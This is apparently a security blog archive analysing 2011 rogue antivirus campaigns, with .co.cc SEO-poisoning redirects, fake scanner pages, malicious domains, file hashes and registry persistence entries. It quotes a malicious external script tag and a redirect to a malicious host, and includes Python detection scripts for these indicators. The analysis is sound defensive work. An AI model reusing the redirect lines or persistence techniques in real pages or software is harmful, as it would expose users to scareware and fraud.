Tag Archives: rogue

Suspicious activity for domains .co.cc

While doing some Google searches for particular keywords, we noticed with one specific search that in some cases the websites found had the same URL path after the .co.cc domain, and that all of them used a $_GET['k'] query parameter related to the keyword being searched for. Almost all the links found also share the same HTML template and look like non-live websites, perhaps used to capture keywords or related to some kind of SEO poisoning activity:

The secret has been revealed:

GET /index.php?k=virus-scan HTTP/1.1
Host: liostimoremvfk.co. cc

Response:

HTTP/1.1 302 Found
Date: Tue, 19 Apr 2011 16:43:03 GMT
Server: Apache/2.2.9 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.6-1+lenny8 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny8
Location: hxxp://includingwhich.cz. cc/in.cgi?4&seoref=[...]
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Connection: close
Content-Type: text/html
 
....................

There is a redirect to… guess what? A fake scanner page…

A popup window prompts the user to download the rogue security software setup:

Network traffic:

GET /get_file.php?id=16 HTTP/1.1
Host: mywebavck-2.co. cc
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16
 
HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 14:41:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Content-Description: File Transfer
Content-Length: 331776
Content-Disposition: attachment; filename="setup.exe"
Connection: close
Content-Type: application/download
 
MZ......................@..................[...]

The setup file appears to be almost undetected by antivirus products:

Report date: 2011-04-19 16:51:48 (GMT 1)
File name: setup-exe
File size: 331776 bytes
MD5 hash: c6adf910c8e56b4b0577ddface41898d
SHA1 hash: 978794a9705fec3f5dd5d7256b147a75d6c6f6fe
Detection rate: 0 on 10 (0%)
Status: CLEAN

A few malicious .co.cc domains used to capture keywords:

Note that the value after k= is the same as the page title!
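The chain described above (a keyword in the k= parameter of /index.php on a free .co.cc sub-domain, answered with a 302 to an in.cgi script carrying a seoref parameter) can be looked for in proxy logs. The following is an added detection example, not code from the original post: the record format and the sample records are constructed, and the list of free sub-domain suffixes is limited to the ones observed here.

```python
"""Flag the .co.cc keyword-doorway pattern in simplified proxy log records.

Added example (not from the original post). Record format, constructed:
    <host> <request-target> <status> <Location-header-or-dash>
"""
from urllib.parse import urlsplit, parse_qs

# Free sub-domain suffixes observed on the doorway and redirect hosts above.
FREE_SUFFIXES = (".co.cc", ".cz.cc")

# Constructed sample records modelled on the traffic shown in the post
# (URLs kept defanged with hxxp, as in the post).
SAMPLE_LOG = """\
liostimoremvfk.co.cc /index.php?k=virus-scan 302 hxxp://includingwhich.cz.cc/in.cgi?4&seoref=x
example.org /index.php?k=virus-scan 200 -
plandicardyu9.co.cc /index.php?k=Spun 302 hxxp://includingwhich.cz.cc/in.cgi?4&seoref=y
vacuumguide.co.cc /index.php?k=loop 302 hxxp://cdn.example.net/static/loop.html
mywebavck-2.co.cc /get_file.php?id=16 200 -
"""


def parse_record(line):
    """Split one record into host, path, parsed query, status and Location."""
    host, target, status, location = line.split(" ", 3)
    parts = urlsplit("http://" + host + target)
    return {
        "host": host.lower(),
        "path": parts.path,
        "query": parse_qs(parts.query),
        "status": int(status),
        "location": None if location == "-" else location,
    }


def is_keyword_doorway(rec):
    """True when a request to /index.php?k=<keyword> on a free sub-domain is
    answered with a 302 whose Location points at an in.cgi script carrying a
    seoref parameter, i.e. the chain shown in the post."""
    if not rec["host"].endswith(FREE_SUFFIXES):
        return False
    if rec["path"] != "/index.php" or "k" not in rec["query"]:
        return False
    if rec["status"] != 302 or not rec["location"]:
        return False
    loc = urlsplit(rec["location"])
    return loc.path.endswith("/in.cgi") and "seoref=" in loc.query


def find_doorways(log_text):
    """Return (doorway host, searched keyword, redirect host) per matching record."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_record(line)
        if is_keyword_doorway(rec):
            hits.append((rec["host"], rec["query"]["k"][0],
                         urlsplit(rec["location"]).netloc))
    return hits


if __name__ == "__main__":
    for host, keyword, tds in find_doorways(SAMPLE_LOG):
        print(f"{host} doorway for '{keyword}' -> {tds}")
```

A 302 from a .co.cc host to a static page (fourth sample record) is deliberately not flagged, so only the doorway-to-TDS chain is reported.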

Other related malicious domains:

All these malicious domains appear to be hosted on this IP address:

95.169.191.217
ns2.km35913.keymachine.de
95.169.160.0/19 - Keyweb AG IP Network
AS31103 - KEYWEB-AS Keyweb AG

IPVoid analysis:

http://www.ipvoid.com/scan/95.169.191.217

Malicious URLs Hosting Fake Scanner Pages

We have detected a few fake scanner pages that are still active and that distribute the dangerous executable files of rogue security software.

Initial fake alert:

Fake scanner page in action:

Prompt to download the (infected) setup file of the rogue software:

Report date: 2011-04-15 01:10:23 (GMT 1)
File name: bestav2-exe
File size: 374784 bytes
MD5 hash: a31da4fa72e277fe8abf298a4aa30d9d
SHA1 hash: 0f7bb119ff7889d3981d8ecdf2494c1cf4ba1a42
Detection rate: 7 on 10 (70%)
Status: INFECTED
Antivirus | Database | Engine | Result
Avast | 15/04/2011 | 5.0 | Win32:Renos-ACT [Trj]
AVG | 15/04/2011 | 10.0.0.1190 | FakeAlert.AAW
Avira AntiVir | 15/04/2011 | 8.2.4.202 | TR/Winwebsec.A.4010
Comodo | 15/04/2011 | 4.0 | TrojWare.Win32.Trojan.Agent.Gen
Emsisoft | 15/04/2011 | 5.1.0.2 | Trojan.Fakealert!IK
F-Prot | 15/04/2011 | 6.3.3.4884 | W32/FakeAlert.LY.gen!Eldorado
Ikarus | 15/04/2011 | T31001097 | Trojan.Fakealert

There is also a reference to an external JS file:

<script type="text/javascript" src="hxxp://figaroo. ru/tools/ip.js"></script>

List of malicious domains and IPs:

At the end of a few fake scanner pages there is also a surprise:

Obfuscated malicious JS code (note also the random function names at the end of the script) that most probably leads to an exploit kit. We can also extract the JS code from the file "/index_files/set00000.js", which is used to display the fake threats in the fake scanner page:

URLVoid domain analysis:

http://www.urlvoid.com/scan/downloadmyprog.biz
http://www.urlvoid.com/scan/ratingswatchdiscussions.com
http://www.urlvoid.com/scan/purityanddivinityspa.com
http://www.urlvoid.com/scan/powerwerxmotorcorp.com

Recent malicious URLs analyzed

Report containing the malicious URLs logged:

URLVoid domain analysis:

New Rogue Software: Windows Support System

Windows Support System (similar to Windows Emergency System) is another rogue security software that claims to scan the system for errors; instead it shows fake errors, stating that the full version of the software must be bought to fix the non-existent errors.

Windows Support System GUI

Fake security alerts:

Fake security alerts

Fake scanner page:

Fake scanner page

Other fake security alert:

Fake security alerts

Regedit is disabled:

Regedit disabled

Installer screenshot:

Installer

Windows Support System is distributed by web exploit kits:

GET /count8.php HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: falsewi. com
 
GET /showthread.php?t=335918 HTTP/1.0
Referer: hxxp://sweetvegetables.gv.vg/showthread.php?t=4005006
Host: sweetvegetables.gv. vg

Setup.exe is downloaded:

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 00:50:50 GMT
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
Content-Length: 18944
Content-Disposition: inline; filename=setup.exe

Report date: 2011-03-22 02:40:57 (GMT 1)
File name: setup.exe
File size: 18944 bytes
MD5 hash: d94f2733e1fa56dd00431927f72b68da
SHA1 hash: 8114e64151a8d64f4364933eb1e9cb28a39693bc
Detection rate: 0 on 9 (0%)
Status: CLEAN

Fake scanner page:

GET /fast-scan/ HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: mbbckoua.co. cc

Download of another rogue security software:

GET /BestAntivirus2011.exe HTTP/1.0
Referer: hxxp://mbbckoua.co. cc/fast-scan/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dl.mbbckoua.co. cc

Report date: 2011-03-22 02:40:57 (GMT 1)
File name: bestantivirus2011-exe
File size: 323584 bytes
MD5 hash: dcd660aa86a5cba024ce9d01bb76f45a
SHA1 hash: 3e85fa411bf9cb44049d61382cd95a66b7fb2180
Detection rate: 0 on 9 (0%)
Status: CLEAN

Another web exploit that distributes Windows Support System:

GET /1010/in.cgi?10 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: roleplaysanctuary.co. cc

Suspicious redirection:

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='hxxp://erofax. ru/podm/go.php'">
</head>
<body>
document moved <a href="hxxp://erofax. ru/podm/go.php">here</a>
</body>
</html>

Fake scanner page:

GET /scan1b/images/sprite.png HTTP/1.0
Referer: hxxp://antivirus-9465.co. cc/scan1b/164
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: antivirus-9465.co. cc

Download of the setup file of Windows Support System:

GET /scan1b/164/freesystemscan.exe HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: antivirus-9465.co. cc

Fake payment system:

GET /soft-usage/favicon.ico?0=1200&1=XXX&2=i-s&3=164&4=2600&5=5&6=1&7=62900.2180&8=1040 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: soft-store-inc. com

URLVoid domain analysis:

New Rogue Software: Windows Emergency System

Windows Emergency System is another rogue security software that claims to scan the system for errors; instead it shows fake errors, stating that the full version of the software must be bought to fix the non-existent errors.

Windows Emergency System GUI

Screenshot of the installer:

Windows Emergency System Installer

Payment page:

soft-store-inc-com

Network traffic:

GET /soft-usage/favicon.ico?0=1200&1=XXX&2=i&3=85&4=2600&5=5&6=1&7=62900.2096&8=1040 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: soft-store-inc.com

Whois:

Domain Name:	SOFTSTORE-INC.COM
Registrar:	DOMAINCONTEXT, INC.
Whois Server:	whois.domaincontext.com
Referral URL:	http://www.domaincontext.com
Name Server:	NS1.REGWAY.COM
Name Server:	NS2.REGWAY.COM
Status:	clientTransferProhibited
Updated Date:	05-mar-2011
Creation Date:	05-mar-2011
Expiration Date:	05-mar-2012

Network traffic:

GET /payment_forms/default/css/pay.css HTTP/1.1
Referer: http://softstore-inc.com/85/40/form/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: softstore-inc.com

Whois:

Domain Name:	SOFT-STORE-INC.COM
Registrar:	DOMAINCONTEXT, INC.
Whois Server:	whois.domaincontext.com
Referral URL:	http://www.domaincontext.com
Name Server:	NS1.REGWAY.COM
Name Server:	NS2.REGWAY.COM
Status:	clientTransferProhibited
Updated Date:	05-mar-2011
Creation Date:	05-mar-2011
Expiration Date:	05-mar-2012

Malicious domains:

http://www.urlvoid.com/scan/soft-store-inc.com
http://www.urlvoid.com/scan/softstore-inc.com

Other suspicious domains:

http://www.urlvoid.com/scan/getsomepornhere.net
http://www.urlvoid.com/scan/softstorecorp2012.com
http://www.urlvoid.com/scan/softstorecorp2011.com

The malware that installed this rogue software created a few files in the C:\ folder:

C:\kill.txt
C:\avenger.txt
C:\cleanup.exe
C:\TITI.exe

Content of C:\

The malware used a legitimate security tool named "Avenger" to remove antivirus products:

kill.txt

avenger.txt

New Rogue Software: Security Essentials 2011

Security Essentials 2011 is another rogue security software, installed by TDSS variants or by drive-by downloads, that claims to scan the system for trojans; instead it shows fake security alerts, stating that the full version of the software must be bought to remove the non-existent detected threats.

File name: setupse2011-exe
File size: 2522624 bytes
MD5 hash: 4a17665f5abf68f89046923cbb33c372
SHA1 hash: b8e2e084eccae7be98652f960ad1a4e646871b80
Detection rate: 6 on 16 (38%)
Status: INFECTED

SE2011 GUI

Security Essentials 2011 prevents the execution of regedit, task manager, notepad and other system utilities that could be used to remove the program. False security alerts are also displayed very frequently, warning the user about non-existent detected threats and network attacks:

SE2011 Fake Alert

SE2011 IP Attacks Alerts

Files created:

SE2011 Files

%AllUsers%\Application Data\Security Essentials 2011\SE2011.exe
%AllUsers%\Application Data\Security Essentials 2011\sefkls\
%AllUsers%\Application Data\Security Essentials 2011\sefkls\sembkasbs.cfg
%UserProfile%\Desktop\Security Essentials 2011.lnk
%UserProfile%\Start Menu\Security Essentials 2011.lnk
%UserProfile%\Application Data\Microsoft\Internet Explorer\Quick Launch\Security Essentials 2011.lnk

Registry modifications:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"updatesst"="%AllUsers%\Application Data\Security Essentials 2011\SE2011.exe"
 
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="%AllUsers%\Application Data\Security Essentials 2011\SE2010.exe" /hide"
 
[HKEY_CURRENT_USER\Software\SE2010]
"LastVFC"="25"
"LastD"="3"
"LastScan"="03.01.2011 17.09"

Dangerous domains:

URLVoid domain analysis:

se-2011-download. com
se-2011-payment. com
get-se-2011. com
get-se2011. com
supercybersecurity. com

New Rogue Software: Easy Scan

Easy Scan is another rogue security software, installed by TDSS variants, that claims to scan the hard drive for errors; instead it shows fake errors, stating that the full version of the software must be bought to repair the non-existent errors.

Easy Scan GUI

File name: 6gvbwczovyxs-exe
File size: 387072 bytes
MD5 hash: 1aacd2bc86b8e3226a39fb6484803b2e
SHA1 hash: 09e81887484c90814ce9b8e5e0caf89980663ddb
Detection rate: 3 on 16 (19%)
Status: INFECTED

File Version Info:

StringFileInfo (000004b0)
LegalCopyright: mdisk Corp . All rights reserved.
CompanyName: mdisk Corp
FileDescription: mdisk
FileVersion: 952
ProductVersion: 101
InternalName: mdisk
OriginalFilename: mdisk
ProductName: mdisk

File name: cvmmcsnbgpjqkx-exe
File size: 478720 bytes
MD5 hash: 7d42fb11e3e533d18eda29b2ca2e6213
SHA1 hash: 97dc3a6255f8feacb32094d12bf998858d06fa53
Detection rate: 3 on 16 (19%)
Status: INFECTED

File Version Info:

StringFileInfo (000004b0)
LegalCopyright: ms SQL Software.
CompanyName: msql software
FileDescription: msql
FileVersion: 152
ProductVersion: 101
InternalName: msql
OriginalFilename: msql
ProductName: msql software

Like most rogue security software, Easy Scan prevents the execution of regedit, task manager and other system utilities that could be used to remove the program. False security alerts are also displayed very frequently from the system tray icon:

Fake Alerts

Order page:

Order page

Network traffic:

GET /dfrg/dfrgr HTTP/1.1
User-Agent: Internet Explorer
Host: clickbrave. org
 
GET /dfrg/dfrg HTTP/1.1
User-Agent: Internet Explorer
Host: searchmiddle. org
 
GET /customers/buy.php?pid=DEFRAG_NNM_BASIC&id=440&subid=01 HTTP/1.1
Host: searchmiddle.org
 
HTTP/1.1 302 Found
Location: hxxps://secure.paymentsprivate. com/defragmenter?product_sku=DEFRAG_NNM_BASIC,DEFRAG_NNM_PREMIUM&default_sku=1&view_eds=1&check_eds=1&affiliate_id=440&affiliate_sid=01
Vary: Accept-Encoding

Domain analysis:

clickbrave. org - 91.200.242.17
searchmiddle. org - 95.169.190.192
secure.paymentsprivate. com - 92.48.127.141
paymentsprivate. com - 92.48.127.141

Files created:

Easy Scan - Files

Executable file:

Executable File

Desktop icon:

Desktop Icon

Registry startup entry:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
%AllUsers%\Application Data\6GVBWCzOVYxS.exe

Interestingly, after some time we noticed new fake security alerts that reminded us of the previously analyzed rogue security software named HDD Doctor:

HDD Doctor Alerts

The new HDD Doctor completely removed the previously installed rogue software Easy Scan and then installed itself on the system, starting to display the false disk error alerts.

New Rogue Software: HDD Doctor

HDD Doctor is another rogue security software that claims to scan the hard drive for errors; instead it shows fake errors, stating that the full version of the software must be bought to fix the non-existent errors.

File name: hdddoctor-exe
File size: 326656 bytes
MD5 hash: eb3e1826afad946a456f9c6b953815ee
SHA1 hash: 6d969d2d010fd783f199cda7442f6824227a6220
Detection rate: 4 on 16 (25%)
Status: INFECTED

HDD Doctor prevents the execution of regedit:

HDD Doctor Alert

The system disk contains a large number of critical errors (fake):

Fake security alerts

And voilà, HDD Doctor is installed:

HDD Doctor

Serious system errors (fake):

System errors

Activate full version now?

Activate full version

Order page:

Purchase page

Network traffic:

33.oneworldbill. com/07/index_new.php?id=02921
33.oneworldbill. com/07/tpb.jpg

Domain analysis:

33.oneworldbill. com - 212.117.162.149

Files created:

%UserProfile%\Application Data\hdddoctor.exe
%UserProfile%\Application Data\install_hdd
%UserProfile%\Desktop\HDD Doctor.lnk
%UserProfile%\Start Menu\Programs\HDD Doctor.lnk

Executable file:

hdddoctor.exe

HDD Doctor on Desktop:

HDD Doctor Desktop Icon

Registry startup entry:

HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
c:\Documents and Settings\Administrator\Application Data\hdddoctor.exe

HDD Doctor also hijacks a few Internet Explorer settings:

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings
"WarnonBadCertRecving" = '0'
 
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings
"WarnOnPostRedirect" = '0'
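The registry entries documented for Security Essentials 2011, Easy Scan and HDD Doctor share three traits: a per-user Winlogon Shell pointing at the rogue binary, a Run entry launching from Application Data, and Internet Explorer warning settings switched to 0. The following added example, not code from the original posts, triages a .reg-style export for those traits; the sample export is constructed from the entries above, with DWORD values simplified to strings.

```python
"""Triage a .reg-style export for the rogue-software persistence and
browser-weakening entries documented above (added example, not from the
original posts). The sample export is constructed from those entries."""
import re

# Constructed from the Security Essentials 2011 and HDD Doctor entries above.
# Real exports encode DWORDs as dword:00000000; values are simplified here.
SAMPLE_REG = r"""
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"updatesst"="%AllUsers%\Application Data\Security Essentials 2011\SE2011.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="%AllUsers%\Application Data\Security Essentials 2011\SE2010.exe /hide"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnonBadCertRecving"="0"
"WarnOnPostRedirect"="0"
"""

KEY_RE = re.compile(r"^\[(.+)\]$")
VAL_RE = re.compile(r'^"([^"]+)"="(.*)"$')

RUN = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
WINLOGON = r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
IE_SETTINGS = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
# User-writable data directories the samples above launch from.
DATA_DIRS = ("\\application data\\", "\\appdata\\")
DISABLED = ("0", "dword:00000000")


def parse_reg(text):
    """Return {key_path: {value_name: value}} from a .reg-style export."""
    tree, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        key = KEY_RE.match(line)
        if key:
            current = key.group(1)
            tree.setdefault(current, {})
            continue
        val = VAL_RE.match(line)
        if val and current is not None:
            tree[current][val.group(1)] = val.group(2)
    return tree


def triage(tree):
    """Return (finding, detail) pairs for the indicators seen in the posts."""
    findings = []
    # A per-user Winlogon\Shell is normally absent; any value other than
    # explorer.exe replaces the desktop shell with the rogue's binary.
    shell = tree.get(WINLOGON, {}).get("Shell")
    if shell is not None and shell.strip().lower() != "explorer.exe":
        findings.append(("winlogon-shell-hijack", shell))
    # Run entries launching from Application Data, as SE2011 and Easy Scan do.
    for name, value in tree.get(RUN, {}).items():
        if any(d in value.lower() for d in DATA_DIRS):
            findings.append(("run-from-data-dir", f"{name}={value}"))
    # IE warnings HDD Doctor switches off (bad certificates, POST redirects).
    for name in ("WarnonBadCertRecving", "WarnOnPostRedirect"):
        if tree.get(IE_SETTINGS, {}).get(name) in DISABLED:
            findings.append(("ie-warning-disabled", name))
    return findings


if __name__ == "__main__":
    for kind, detail in triage(parse_reg(SAMPLE_REG)):
        print(f"{kind}: {detail}")
```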